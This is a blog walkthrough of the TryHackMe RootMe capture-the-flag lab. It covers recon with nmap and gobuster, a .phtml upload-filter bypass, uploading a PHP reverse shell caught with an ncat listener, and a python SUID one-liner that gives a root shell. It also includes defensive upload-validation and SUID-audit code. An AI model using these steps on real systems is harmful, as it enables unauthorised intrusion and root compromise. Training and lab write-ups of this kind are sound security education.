RootMe CTF: TryHackMe A Beginner’s Guide to Capture the flag


April 9, 2021

In this blog post, you will learn how to hack the RootMe machine from TryHackMe.

So let’s jump straight to TryHackMe and deploy the machine. Here is the link to the room: https://www.tryhackme.com/room/rrootme

TASK-1: Deploy the Machine

Start the machine.

1. Deploy the machine

– No answer needed.

TASK-2: Reconnaissance

Reconnaissance refers to the practice of gathering information about a target. This intelligence gathering can be done with both pure and impure intentions; we are doing it with pure intentions on this test machine named RootMe. So let’s perform a quick Nmap scan and find information about the target.

  • In case you don’t know, Nmap (Network Mapper) has emerged as one of the most popular free network discovery tools on the market, and it is now one of the core tools network administrators use to map their networks.

To scan the target machine you can use the following command:

nmap -A -T4 <MACHINE_IP>
  • -A : Enable OS detection, version detection, script scanning, and traceroute.
  • -T4 : Set the timing template (higher is faster).

Nmap scan result:

  • 22/tcp open  ssh     OpenSSH 7.6p1
  • 80/tcp open  http    Apache httpd 2.4.29
  • Service Info: OS: Linux

1. Scan the rootme machine, how many ports are open?

– 2

2. What version of Apache is running?

– 2.4.29

3. What service is running on port 22?

– ssh

4. Find directories on the web server using the GoBuster tool.

What is Gobuster?

  • Gobuster is a tool used to brute-force URIs (directories and files) on web servers and DNS subdomains (with wildcard support). To learn more about Gobuster and its installation process visit: https://github.com/OJ/gobuster

To brute-force directories you can use the following command:

gobuster dir -u <URL> -w <WORDLIST_LOCATION>
  • -u : URL of the RootMe machine.
  • -w : Path to the wordlist.

– No answer needed.

5. What is the hidden directory?

– /panel/

TASK-3: Getting a Shell

Navigate to the URL: http://<MACHINE_IP>

It’s a basic web page with nothing interesting.

Let’s check the source code of the website; sometimes you’ll end up finding sensitive endpoints, passwords, hidden paths, and secret keys inside the source code.

Here we got nothing in the source code, so let’s see what’s in the hidden directory /panel/ we previously discovered using Gobuster.

Navigate to the URL: http://<MACHINE_IP>/panel

Here we found a file upload form where we can upload files.

Ah!!!! What if we can upload malicious .php files? Let’s check.

Tried .php – Denied. 

Tried .phtml – Success !!!!

Wanna know how I did this? It’s called a file upload restriction bypass: the upload filter rejects the .php extension by name, but the web server still hands .phtml files to the PHP interpreter, so the filter is bypassed.

To learn in depth about this do visit: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
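As an added defensive example (not code from the original writeup), the flawed deny-list check that the room's upload form behaves like is shown beside an allow-list check that also refuses .phtml and the other extensions a typical PHP handler serves; the set of allowed image extensions is an assumption for this example.

```python
import os
import re

# Extensions a typical Apache/mod_php setup hands to the PHP interpreter.
# A deny list that only names ".php" misses every other entry here.
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phps", "phtml", "phar"}

# Constructed allow list for an image-only upload form (assumption for this example).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def deny_list_check(filename: str) -> bool:
    """Flawed filter modelled on the behaviour seen in the room: only '.php' is refused.
    Returns True when the upload would be accepted."""
    return not filename.lower().endswith(".php")


def allow_list_check(filename: str) -> bool:
    """Hardened filter: accept only a known-good final extension and refuse any
    name carrying a PHP-family extension in an inner position, since some handler
    configurations match on inner extensions ('shell.phtml.jpg').
    Returns True when the upload would be accepted."""
    base = os.path.basename(filename)          # ignore any path component
    if not base or base.startswith("."):       # empty names and dotfiles (.htaccess)
        return False
    if re.search(r"[\x00-\x1f]", base):        # null bytes / control characters
        return False
    parts = base.lower().split(".")
    if len(parts) < 2:                          # no extension at all
        return False
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False
    return not any(ext in PHP_EXTENSIONS for ext in parts[1:-1])
```

Pair the check with a server configuration that never executes scripts from the uploads directory (for Apache with mod_php, a <Directory> block carrying php_admin_flag engine off), so a filter slip does not become code execution.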

Now we can upload a PHP reverse shell here. We’ll use pentestmonkey’s php-reverse-shell.php script to obtain the reverse shell using netcat.

Download the script; remember to replace $ip in the script with your machine’s IP and $port with any port of your choosing. I’ll be using 1337.

  • Save the changes and upload the script (with a .phtml extension) on http://<MACHINE_IP>/panel
  • Start the netcat listener on any port. I’m using port 1337.

A netcat listener can be started using the following command:

ncat -nlvp <PORT_NUMBER>
  • -n : Do not resolve hostnames via DNS
  • -l : Bind and listen for incoming connections
  • -v : Set verbosity level (can be used several times)
  • -p : Specify source port to use

Now we’ll gain the reverse shell by executing the uploaded script, visiting the following URL:

http://<MACHINE_IP>/uploads/php-reverse-shell.phtml

Voilà!!!!!

We have successfully gained a shell.

But the shell is not stable; let’s make it stable using the following command:

python3 -c 'import pty; pty.spawn("/bin/bash")'

And find the user.txt file using the following command:

find / -type f -name user.txt 2>/dev/null
  • -type f : searches files only.
  • -name : name of the file to locate.
  • 2>/dev/null : suppresses errors.

We have found the user.txt file; it’s inside /var/www/.

To read the data inside the file you can use the following command:

cat /var/www/user.txt

1. user.txt

– THM{XXXXXXXXXXXXXXXX}

TASK-4: Privilege Escalation

To escalate privilege we need to hunt for the files with SUID permission.

  • SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner.

This can be done using the following command:

find / -type f -user root -perm -4000 2>/dev/null
  • -type f : searches files only.
  • -user root : only files owned by root.
  • -perm -4000 : files with the SUID bit set.
  • 2>/dev/null : suppresses errors.

Ah!!!!!!! Here /usr/bin/python has SUID permission – Interesting.
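As an added defender-side example (not part of the original writeup), this Python script audits a host for root-owned SUID files, the same property the find command above selects, and reports anything off a per-host baseline plus any interpreter that is SUID regardless of baseline; the baseline set is a constructed, illustrative assumption.

```python
import os
import re
import stat
from typing import Iterable, Set

# Constructed, illustrative baseline of root-owned SUID files for a clean build of
# the host image (assumption for this example; generate yours from a known-good box).
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
                 "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping"}

# Interpreters and editors must never be SUID, baseline or not: as the room shows
# with python, one line is enough to turn them into a root shell.
NEVER_SUID_NAMES = {"python", "perl", "ruby", "bash", "sh", "vim", "find", "env"}

# Pseudo-filesystems whose errors the page's find hides with 2>/dev/null.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}

def is_root_suid(path: str) -> bool:
    """Same predicate as find's '-type f -user root -perm -4000'."""
    try:
        st = os.lstat(path)                    # lstat: do not follow symlinks
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)

def find_root_suid(root: str = "/") -> Set[str]:
    """Walk the filesystem and collect every root-owned SUID regular file."""
    found = set()
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_root_suid(path):
                found.add(path)
    return found

def unexpected_suid(found: Iterable[str], baseline: Set[str]) -> Set[str]:
    """Flag anything off-baseline, plus interpreters even when baselined."""
    flagged = set()
    for path in found:
        name = re.sub(r"[\d.]+$", "", os.path.basename(path))   # python3.6 -> python
        if path not in baseline or name in NEVER_SUID_NAMES:
            flagged.add(path)
    return flagged

if __name__ == "__main__":
    for path in sorted(unexpected_suid(find_root_suid(), EXPECTED_SUID)):
        print("unexpected SUID binary:", path)
```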

1. Search for files with SUID permission, which file is weird?

– /usr/bin/python

2. Find a form to escalate your privileges.

– No answer needed.

Let’s escalate our privileges.

  • GTFOBins has a collection of privilege escalation commands; it can be found at:

https://gtfobins.github.io/

  • Search for python with the SUID function on GTFOBins.

We got commands for privilege escalation. Here we can skip the first command, as the python binary already has SUID permission. Copy and paste the second command into the terminal without the ./ prefix to see if it works.

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Voilà!!!!!! It works.

We have successfully escalated our privileges.

As we are root now, let’s hunt for the root flag.

It’s in the /root directory.

cat /root/root.txt

1. root.txt

– THM{XXXXXXXXXXXXXXXX}

DONE. ROOM COMPLETED!!!!!

Salud!!!!!

The RootMe CTF is aimed at beginners, and I would recommend that all beginners try to root it.
